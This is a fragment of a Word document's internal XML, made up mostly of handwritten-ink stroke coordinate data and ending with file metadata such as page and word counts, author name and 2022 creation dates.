0,-11 8 0,1-7 0,4 7 0,-5-4 0,5 5 0,-4-4 0,5 3 0,-8-3 0,8 4 0,9 0 0,1 0 0,5 0 0,0 0 0,-17 0 0,14 0 0,-10 0 0,7 5 0,-1 0 0,-9 1 0,-6 2 0,-5-7 0,-7 3 0,-12-4 0,1 0 0,7 0 0,8 0 0,9-4 0,-6-1 0,-3 0 0,1-3 0,-5 3 0,42-6 0,-33 6 0,39-5 0,-33 9 0,12-4 0,-1 5 0,-5 0 0,-3 0 0,-11-4 0,4 3 0,-11-3 0,11 4 0,-11 0 0,11 0 0,-11 0 0,5 0 0,-6 0 0,6 0 0,-4-3 0,9 2 0,-4-3 0,6 4 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,-6 0 0,-1 0 0,-6 0 0,0 0 0,-5 0 0,4 0 0,-9 0 0,4 0 0,5-4 0,-8 0 0,13 0 0,-8 1 0,4-1 0,6 3 0,-5-7 0,5 7 0,-6-2 0,0 3 0,0 0 0,0 0 0,0 0 0,-5-4 0,4 3 0,-4-2 0,5 3 0,0 0 0,1 0 0,-1 0 0,6 0 0,-5 0 0,10 0 0,-3 0 0,-2 0 0,6 0 0,-5 0 0,1 4 0,-2 0 0,-11 5 0,-1-5 0,-6 3 0,3-6 0,5 5 0,2-6 0,4 3 0,-2-3 0,6 4 0,-5 1 0,18 5 0,-4-1 0,12 1 0,1 1 0,-1-1 0,-6 4 0,-7-3 0,-2 2 0,-11-4 0,5-1 0,-11 1 0,-2-1 0,2-1 0,-8 0 0,12 0 0,-7-4 0,4 0 0,3 1 0,-4-3 0,5 7 0,0-3 0,0 3 0,1 1 0,-1-5 0,-5 4 0,-2-8 0,-4 4 0,2-1 0,0-2 0,1 2 0,0-3 0,-1 0 0,5 0 0,-4 0 0,8 0 0,-10 0 0,4 0 0,5 0 0,-8 0 0,8 0 0,-8 0 0,-2-4 0,4 0 0,2 0 0,-7 1 0,8 0 0,-6 0 0,0-4 0,4 1 0,-1 2 0,-6-1 0,15 4 0,-14-5 0,5 5 0,2-5 0,-9 6 0,12-3 0,-5 3 0,-3 0 0,6 0 0,-8 0 0,7 0 0,-3 0 0,0-3 0,0 2 0,0-2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00:50.235"/>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1 118 16383,'74'0'0,"-2"0"0,-24 0 0,-5 0 0,9 0 0,-10 0 0,5 0 0,-6 0 0,-1 0 0,-6 0 0,6 0 0,-5 0 0,5 0 0,-6 0 0,0 0 0,0 0 0,1 0 0,-1 4 0,-5-3 0,4 7 0,-9-8 0,4 4 0,0 0 0,-4-3 0,9 7 0,-4-7 0,5 2 0,6-3 0,-5 4 0,11-3 0,-5 7 0,6-7 0,-5 7 0,3-7 0,-3 3 0,4 0 0,-4-3 0,3 3 0,-4-4 0,6 0 0,-6 4 0,-1-3 0,-6 2 0,0-3 0,0 0 0,0 0 0,6 0 0,-5 4 0,25-3 0,-21 3 0,20-4 0,-17 0 0,5 0 0,0 0 0,-6 0 0,5 0 0,-11 0 0,5 0 0,-6 0 0,0 0 0,6 0 0,-5 0 0,11 0 0,-10 0 0,9 0 0,-10 0 0,5 0 0,-6 0 0,0 0 0,0 0 0,6 0 0,-4 0 0,4 0 0,-11 0 0,4 0 0,-4 0 0,0 0 0,4 0 0,-4 0 0,5 0 0,0 0 0,0 0 0,5 0 0,3 0 0,11 0 0,-4 0 0,11 0 0,-5 0 0,1 0 0,4 0 0,-11 0 0,11 0 0,-11 0 0,11 0 0,-11 0 0,4 0 0,-5 0 0,-2 0 0,2 0 0,-1 0 0,-6 0 0,-1 0 0,0 0 0,1 0 0,1 0 0,17 0 0,-20 0 0,21 0 0,-19 0 0,5-4 0,-4 3 0,-2-3 0,-6 4 0,-5 0 0,4 0 0,-9 0 0,8 0 0,3 0 0,1-4 0,4 3 0,0-3 0,1 4 0,1-4 0,-8 3 0,-6-2 0,-5 3 0,6-3 0,-5 2 0,5-5 0,9 5 0,-11-6 0,16 6 0,-14-6 0,5 6 0,0-7 0,0 7 0,6-7 0,-4 7 0,9-7 0,-3 7 0,5-3 0,7-1 0,-6 4 0,6-8 0,-2 8 0,-3-7 0,-2 7 0,-1-4 0,-11 2 0,11 2 0,-5-7 0,1 7 0,4-8 0,-11 8 0,5-7 0,-6 7 0,-5-2 0,4 3 0,-9-4 0,8 0 0,-7-1 0,7-2 0,-8 6 0,4-6 0,0 6 0,1-6 0,5 6 0,0-3 0,1 4 0,-1-4 0,-5 3 0,-1-3 0,-5 4 0,3-2 0,2-1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8:43:54.37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1 170 16383,'62'0'0,"7"-5"0,2 4 0,7-9 0,8 3 0,-26 1 0,22 1 0,-31 0 0,18 4 0,7-3 0,-23 4 0,8 0 0,-27 0 0,1 0 0,-1 0 0,6 0 0,-5 0 0,11 0 0,-11 0 0,11 0 0,-11 0 0,5 0 0,-6 0 0,-5 0 0,4 0 0,-9 0 0,9 0 0,-9 0 0,4 0 0,-5 0 0,0 0 0,0 0 0,0 0 0,0 0 0,5 0 0,-4 0 0,9 0 0,-4 0 0,0 0 0,4 0 0,-9 0 0,0 0 0,-2 0 0,-8 0 0,4 0 0,-2 0 0,-2 0 0,12 0 0,-10 0 0,12 0 0,-9 0 0,4 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,5 0 0,-4 0 0,9 0 0,-4 0 0,1 0 0,-2 0 0,-1 0 0,-3 0 0,0 0 0,-2 0 0,-4 0 0,5 0 0,-4-3 0,3 2 0,-3-2 0,4 3 0,4 0 0,3 0 0,4 0 0,0 0 0,6 0 0,1 0 0,7 0 0,-1 0 0,0 0 0,-1 0 0,23 0 0,-27 0 0,31 0 0,-35 0 0,15 0 0,1 0 0,-6 0 0,6 0 0,0 0 0,8 0 0,-10 0 0,30 0 0,-29 0 0,32 0 0,-6 0 0,9 0 0,9 0 0,-44 0 0,-1 0 0,48 0 0,-42-1 0,-2 2 0,21 3 0,15-3 0,-20 3 0,8-4 0,0 0 0,-18 0 0,-8 0 0,-13 0 0,-6 0 0,-7 0 0,-10 0 0,0 0 0,-2-2 0,-3 1 0,7-2 0,3 3 0,6 0 0,10 0 0,24 0 0,-17 0 0,44 0 0,-43 0 0,29 0 0,-27 0 0,5 0 0,-7 0 0,0-4 0,-6 3 0,-1-3 0,-6 4 0,0 0 0,1-4 0,-2 3 0,7-3 0,7 4 0,9 0 0,-1 0 0,5 0 0,-4 0 0,5 0 0,-5 0 0,4 0 0,-11 0 0,5-4 0,-7 3 0,0-3 0,-5 0 0,3 3 0,-3-3 0,5 0 0,0 3 0,0-3 0,0 4 0,0 0 0,0 0 0,-6 0 0,5 0 0,-11-4 0,10 3 0,-9-2 0,4 3 0,0 0 0,-5 0 0,11 0 0,-11 0 0,11 0 0,-11 0 0,11 0 0,-4 0 0,-1 0 0,4 0 0,-3 0 0,27 0 0,-16 0 0,10 0 0,-11 0 0,-2 0 0,5 4 0,-2 1 0,-6 4 0,-6-4 0,-1 0 0,-6-5 0,1 3 0,-1-2 0,-5 3 0,4-4 0,-4 0 0,5 0 0,0 0 0,6 0 0,-4 0 0,9 0 0,-9 0 0,9 0 0,-9 0 0,3 0 0,1 0 0,-4 0 0,4 0 0,-6 0 0,0 0 0,0 0 0,0 0 0,-5 0 0,-1 0 0,0 0 0,-8 0 0,6 0 0,-7 0 0,0-3 0,-2 3 0,-1-3 0,1 0 0,-1 0 0,1-1 0,11 2 0,5 2 0,14 0 0,-1 0 0,8 0 0,17 0 0,2 0 0,22 0 0,-15 0 0,-7 0 0,-22 0 0,-1 0 0,1 0 0,0 2 0,-1 1 0,1-2 0,18 4 0,-7-5 0,0 5 0,-7-4 0,5 3 0,-5-4 0,22 0 0,-23 0 0,36 0 0,-49 0 0,41 0 0,-32 0 0,19 0 0,-8 0 0,-5 0 0,-2 0 0,-7 0 0,0 0 0,0 0 0,0 0 0,-5 0 0,3 0 0,-9 0 0,10 0 0,9 0 0,-11 0 0,16 0 0,-12 0 0,7 0 0,22 6 0,-28-5 0,49 10 0,-60-9 0,45 8 0,-33-9 0,12 8 0,-1-8 0,-6 8 0,4-8 0,-3 8 0,-1-8 0,-7 8 0,-8-8 0,-11 6 0,-2-3 0,-11 3 0,-1-3 0,10-2 0,5-6 0,17-1 0,1-9 0,-1 4 0,22-10 0,6 2 0,14-1 0,5 2 0,-5 5 0,-20 6 0,13-5 0,-31 10 0,18-4 0,-7 0 0,-7 4 0,-7-3 0,-2 4 0,-10 0 0,10 0 0,-11 0 0,11 0 0,-5 0 0,6 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,-5 0 0,5 0 0,-10-4 0,3 3 0,-4-7 0,-1 7 0,0-6 0,-5 6 0,3-7 0,-7 4 0,3-1 0,-6 2 0,6-1 0,-3 3 0,3-2 0,-6 3 0,-3 0 0,-1 0 0,-5 0 0,3 0 0,0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00:46.402"/>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26 16383,'88'0'0,"-5"0"0,-15 0 0,-26 0 0,47 0 0,-43 0 0,41 0 0,-43 0 0,13 0 0,-19 0 0,15 0 0,-5 0 0,-2 0 0,-4 0 0,3 0 0,-4 0 0,1 0 0,3 0 0,-3 0 0,5 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-6 0 0,-1 0 0,-10 0 0,-3 0 0,1 0 0,-7 0 0,10 0 0,-7 0 0,4 0 0,2 0 0,-9 0 0,13-3 0,-8 3 0,0-3 0,4 0 0,-10 2 0,8-2 0,0 3 0,-5-3 0,8 2 0,-9-2 0,9 3 0,-4 0 0,-1 0 0,0 0 0,2-3 0,-5 3 0,2-3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7T06:00:44.228"/>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1 193 16383,'98'-3'0,"-41"2"0,-7 0 0,-16 1 0,25 0 0,-23 0 0,4 0 0,-11 0 0,4 0 0,-9 0 0,4 0 0,5 0 0,-8 0 0,13 0 0,-9 0 0,6 0 0,5 0 0,-5 0 0,5 0 0,-7 0 0,2 0 0,-1 0 0,0 0 0,0 0 0,-5 0 0,-1 0 0,-5 0 0,10 0 0,-8 0 0,9 0 0,-12 0 0,1 0 0,5 0 0,-3 0 0,7 0 0,-7 0 0,7 0 0,-7 0 0,3 0 0,0 0 0,-7 0 0,17 0 0,-21 0 0,15 0 0,-3 0 0,-4 0 0,13 0 0,-14 0 0,3 0 0,1 0 0,-4 0 0,9-4 0,-9 3 0,4-2 0,5-1 0,-12 3 0,10-2 0,-6 0 0,-6 2 0,20-2 0,-17 3 0,16 0 0,-14 0 0,9 0 0,-9 0 0,9 0 0,-9 0 0,9 0 0,-9 0 0,9 0 0,-4 0 0,0 0 0,4 0 0,-4 0 0,5 0 0,-5 0 0,4 0 0,-9 0 0,4 0 0,10 0 0,-11 0 0,11 0 0,-10 0 0,-4 0 0,9 0 0,-4 0 0,5 0 0,0 0 0,-5 0 0,4 0 0,-9 0 0,4 0 0,5 0 0,-2 0 0,3 0 0,-6 0 0,-5 0 0,10 0 0,-7 0 0,7 0 0,-10 0 0,0 0 0,15 0 0,-12 0 0,17 0 0,-18 0 0,7 0 0,-3 0 0,6 0 0,5 0 0,-5 0 0,11 0 0,-5 0 0,0 0 0,5 0 0,-11 0 0,11 0 0,-10 0 0,3 0 0,-4 0 0,-2 0 0,7 0 0,-4 0 0,4 0 0,-1 0 0,-3 0 0,10 0 0,-5 0 0,6 0 0,0 0 0,1 0 0,-8 0 0,6 0 0,-11 0 0,11 0 0,-11 0 0,5 0 0,0 0 0,-5 0 0,11 0 0,-10 0 0,9 0 0,10 0 0,10 0 0,6 0 0,-14 0 0,1 0 0,-8 0 0,11 0 0,1 0 0,-6-4 0,-3 3 0,-5-7 0,40 2 0,-36 0 0,35-3 0,-39 8 0,8-3 0,-1 0 0,-8 3 0,-1-8 0,-11 8 0,5-7 0,-1 7 0,-3-6 0,4 2 0,-6 0 0,0-2 0,0 2 0,0 0 0,-5-2 0,-1 6 0,-5-6 0,15 3 0,-11-1 0,16-2 0,-14 6 0,0-6 0,3 6 0,-2-3 0,-1 1 0,-1 2 0,-5-2 0,4 3 0,-2 0 0,2 0 0,11-4 0,-6 4 0,8-4 0,-7 4 0,-9 0 0,8 0 0,-7 0 0,2 0 0,7 0 0,-8 0 0,7 0 0,-5 0 0,1 0 0,11 0 0,-5 0 0,11 0 0,-5 0 0,0 0 0,5 0 0,-10 0 0,4 0 0,0 0 0,1 0 0,6 0 0,0 0 0,14 0 0,-21 0 0,25 0 0,-27 0 0,22 0 0,-11 0 0,10 0 0,4 0 0,-12 0 0,16 0 0,-25 0 0,12 0 0,-8 0 0,-5 0 0,-1 0 0,-5 0 0,4 0 0,-3 0 0,9 0 0,-4 0 0,6 0 0,0 0 0,0 0 0,-6 0 0,5 0 0,-11 0 0,5 0 0,-11 0 0,4 0 0,-4 0 0,0 0 0,4 0 0,-4 0 0,4 0 0,2 0 0,5 0 0,-5 0 0,5 0 0,0 0 0,-5 0 0,10 0 0,17 0 0,4 0 0,0-4 0,16 3 0,-41-2 0,48 3 0,-42 0 0,2 0 0,2 0 0,18 0 0,27 0 0,-10 0 0,3 0 0,-37 0 0,2 0 0,4 0 0,2 0 0,-2 0 0,2 0 0,8-1 0,1 2 0,0 1 0,1 2 0,0-1 0,2 2 0,7 8 0,2 2 0,-5-3 0,0 0 0,1 3 0,-2-1 0,-13-3 0,-1-2 0,0 1 0,0-1 0,6-2 0,-3 1 0,24 9 0,-21-10 0,-3-1 0,-3 4 0,26 2 0,-1-1 0,-25-4 0,-10-2 0,0 0 0,-1-4 0,32 4 0,-35-1 0,-6-3 0,-2 4 0,-5-5 0,1 0 0,-1 0 0,0 0 0,12 0 0,-3 4 0,18-3 0,1 3 0,-10-4 0,14 5 0,-23-4 0,10 3 0,-5 1 0,-7-4 0,-1 3 0,-11-4 0,-1 0 0,-5 0 0,6 0 0,-3 0 0,2 0 0,-3 0 0,-1-5 0,-10-21 0,-1 5 0,-13-17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33</Pages>
  <Words>3922</Words>
  <Characters>22356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Sukla (V)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Vamsi Sukla (V)</cp:lastModifiedBy>
  <cp:revision>68</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-08-17T05:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-08-17T10:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>